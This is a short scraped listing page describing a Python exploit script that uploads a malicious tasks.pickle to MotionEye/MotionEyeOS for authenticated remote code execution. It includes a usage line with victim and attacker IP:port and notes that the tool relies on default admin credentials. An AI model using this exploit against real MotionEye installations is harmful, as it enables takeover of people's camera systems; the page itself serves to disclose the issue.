A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

Oct 23, 2021 1 min read

MotionEye/MotionEyeOS Authenticated RCE

A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye. You need administrator credentials, so it should not be that big of a deal. Unfortunately, MotionEye/MotionEye tend to be ran with default credentials.

Example:

main.py –victim 192.168.1.2 –attacker 192.168.1.3:4444

Where victim and attacker are in the form of ip:port, unless it is port 80. Then, the port can be excluded. This uses the default username of admin with a blank password. There are also CLI options for alternate usernames/passwords. Please see the code for more details.

See https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye for a writeup on this and other issues.

GitHub

Scripts

John was the first writer to have joined pythonawesome.com. He has since then inculcated very effective writing and reviewing culture at pythonawesome which rivals have found impossible to imitate.

A Python 3 script that uploads a tasks.pickle file that enables RCE in MotionEye

MotionEye/MotionEyeOS Authenticated RCE

GitHub

John

Disable dark mode in Django admin user interface in Django 3.2.x

A Django application to register and authenticate users using phone number

MotionEye/MotionEyeOS Authenticated RCE

GitHub

Disable dark mode in Django admin user interface in Django 3.2.x

A Django application to register and authenticate users using phone number

You might also like...